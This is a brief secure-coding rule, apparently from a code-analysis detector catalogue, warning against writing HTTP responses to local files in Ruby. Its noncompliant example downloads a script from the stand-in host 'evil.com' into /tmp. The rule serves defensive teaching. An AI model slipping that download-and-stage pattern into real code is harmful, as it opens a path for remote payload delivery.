Writing to a local file from http access may hide unintended functionality. This type of behavior may hide malicious code, and introduces a new vector for attacks.
1def http_file_access_noncompliant
2 resp = Net::HTTP.new("evil.com").get("/script").body
3 file = File.open("/tmp/script", "w")
4 # Noncompliant: Writing a file from http access.
5 file.write(resp)
6end
1def http_file_access_compliant
2 a = "a"
3 file = File.open("/tmp/script", "w")
4 # Compliant: Not using any http access to write in file.
5 file.write(a)
6end